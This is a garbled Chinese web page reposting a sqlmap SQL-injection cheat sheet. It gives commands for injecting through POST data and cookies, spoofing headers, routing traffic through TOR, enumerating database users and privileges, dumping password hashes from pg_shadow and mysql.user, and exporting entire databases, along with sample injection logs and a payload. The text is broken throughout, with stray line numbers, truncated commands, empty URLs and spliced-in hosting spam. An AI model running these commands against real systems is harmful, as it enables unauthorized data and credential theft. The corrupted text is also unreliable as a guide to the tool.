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时间:2021-07-01 10:21:17 帮助过:9人阅读

注入常用语句 T users sinp 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissettnameisnull bunnyming 这个东西,是mickey整理的,不多说了,尊重一下原作者,转载注明mickey整理就好了 21 22 更新 23


T users sinp> 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissett nameisnull bunny ming 这个东西,是mickey整理的,不多说了,香港服务器,尊重一下原作者,转载注明mickey整理就好了 21 22 更新 23 svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev m=1-v 1 –sql-shell //执行SQL语句 m更详细的信息 options from a configuration INI file 30 sqlmap -c sqlmap.conf 31 32 使用POST方法提交 sqlmap/oracle/post_int.php” –method POST –data “id=1使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies sqlmap使用referer欺骗 sqlmap使用自定义user-agent,或者使用随机使用自带的user-agents.txt sqlmapagent “Mozillapython sqlmap.py sqlmapa “.agents.txt” 46 47 使用基本认证 sqlmap使用Digest认证 sqlmap使用代理,配合TOR sqlmap.1.47:3128sqlmap.1.47:8118 56 57 使用多线程猜解 sqlmap–threads 绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入 sqlmapp “id sqlmapcatp “cat,id” sqlmapagent” –.7rc1 (http://sqlmap.sourceforge.net)” 64 65 指定数据库,绕过SQLMAP的自动检测 sqlmap/pgsql/get_int.php?id=1-v 2 –dbms “PostgreSQL” MySQL 69 * Oracle 70 * PostgreSQL 71 * Microsoft SQL Server 72 73 指定操作系统,绕过SQLMAP自动检测 sqlmap/pgsql/get_int.php?id=1-v 2 –os “Windows” Linux 77 * Windows 78 79 自定义payload 80 Options: –prefix and –postfix circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix. users . “‘) LIMIT 0, 1″;: .″ test” 87 88 [...] 89 [hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis 90 [hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’ 91 [hh:mm:16] [TRAFFIC OUT] HTTP request: 92 GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20 93 %28%27test%27=%27test HTTP/1.1 94 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 95 Host: 96 Accept-language: en-us,en;q=0.5 97 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, 98 image/png,*/*;q=0.5 99 User-agent: sqlmap/0.7rc1 () 100 Connection: close 101 [...] 102 [hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable 103 [...] 104 105 As you can see, the injection payload for testing for custom injection is: 106 107 id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test 108 109 which URL decoded is: test makes the query syntatically correct to the page query: users (‘test’='test’) LIMIT 0, 1 116 117 In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it. 118 119 页面比较 120 python sqlmap.py -u “?id=1″ –string “luther” -v 1 121 python sqlmap.py -u “?id=1″ –regexp “lu[\w][\w]er” -v 122 123 排除网站的内容 124 python sqlmap.py -u “?id=1″ –excl-reg “Dynamic content: ([\d]+)” 125 126 多语句测试,php内嵌函数mysql_query(),不支持多语句 127 python sqlmap.py -u “?id=1″ –stacked-test -v 1 128 129 union注入测试 130 python sqlmap.py -u “?id=1″ –union-test -v 1 131 132 unionz注入配合orderby 133 python sqlmap.py -u “?id=1″ –union-test –union-tech orderby -v 1 134 135 python sqlmap.py -u “?id=1″ -v 1 –union-use –banner 136 python sqlmap.py -u “?id=1″ -v 5 –union-use –current-user 137 python sqlmap.py -u “?id=1″ -v 1 –union-use –dbs 138 139 fingerprint 140 python sqlmap.py -u “?id=1″ -v 1 -f 141 python sqlmap.py -u “?name=luther” -v 1 -f -b 142 143 判断当前用户是否是dba 144 python sqlmap.py -u “?id=1″ –is-dba -v 1 145 146 列举数据库用户 147 python sqlmap.py -u “?id=1″ –users -v 0 148 149 列举数据库用户密码 150 python sqlmap.py -u “?id=1″ –passwords -v 0 151 python sqlmap.py -u “?id=1″ –passwords -U sa -v 0 152 153 查看用户权限 154 python sqlmap.py -u “?id=1″ –privileges -v 0 155 python sqlmap.py -u “?id=1″ –privileges -U postgres -v 0 156 157 列数据库 158 python sqlmap.py -u “?id=1″ –dbs -v 0 159 160 列出指定数据库指定表的列名 161 python sqlmap.py -u “?id=1″ –columns -T users -D test -v 1 162 163 列出指定数据库的指定表的指定列的内容 164 python sqlmap.py -u “?id=1″ –dump -T users -D master -C surname -v 0 165 166 指定列的范围从2-4 167 python sqlmap.py -u “?id=1″ –dump -T users -D test –start 2 –stop 4 -v 0 168 169 导出所有数据库,所有表的内容 170 python sqlmap.py -u “?id=1″ –dump-all -v 0 171 172 只列出用户自己新建的数据库和表的内容 173 python sqlmap.py -u “?id=1″ –dump-all –exclude-sysdbs -v 0 174 175 sql query 176 python sqlmap.py -u “?id=1″ –sql-query “SELECT usename FROM pg_user” -v 0 177 python sqlmap.py -u “?id=1″ –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3″ -v 1 178 179 SELECT usename, passwd FROM pg_shadow ORDER BY usename 180 181 保存和恢复会话 182 python sqlmap.py -u “?id=1″ -b -v 1 -s “sqlmap.log” 183 184 保存选项到INC配置文件 185 python sqlmap.py -u “?id=1″ -b -v 1 –save ===================================================== 2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,网站空间,可以直接修改为百度 194 3、 195 python sqlmap.py -u "" -v 1 [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds 199 [hh:mm:26] [INFO] url is stable id' is dynamic id' is dynamic id' is dynamic id' 204 [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET idid' is numeric/unescaped injectable 209 [hh:mm:26] [INFO] testing MySQL ) 211 [hh:mm:26] [INFO] retrieved: 55 212 [hh:mm:26] [INFO] performed 20 queries in 0 seconds 213 [hh:mm:26] [INFO] confirming MySQL ) 215 [hh:mm:26] [INFO] retrieved: 1 216 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 217 [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 218 0, 1 219 [hh:mm:26] [INFO] retrieved: 5 220 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 221 remote DBMS: MySQL >= 5.0.0 4、指定参数注入 python sqlmap.py -u "" -v 1 228 -p "id" [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds 232 [hh:mm:18] [INFO] url is stable id' 234 [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter [hh:mm:18] [INFO] confirming numeric/unescaped injection on idid' is numeric/unescaped injectable 239 [...] Or if you want to provide more than one parameter, for instance: $ python sqlmap.py -u "" -v 246 1 -p "cat,id" 5、指定方法和post的数据 250 python sqlmap.py -u "" --method "POST" -- 251 data "id=1&cat=2" 6、指定cookie,可以注入一些需要登录的地址 255 python sqlmap.py -u "" --cookie 256 "COOKIE_VALUE" 7、通过代理注入 260 python sqlmap.py -u "" --proxy 261 "" 262 8、指定关键词,香港服务器,也可以不指定。程序会根据返回结果的hash自动判断 263 python sqlmap.py -u "" --string 264 "STRING_ON_TRUE_PAGE" 265 9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。 266 --remote-dbms 267 10、指纹判别数据库类型 268 python sqlmap.py -u "" -v 1 -f 269 11、获取banner信息 270 python sqlmap.py -u "" -b .

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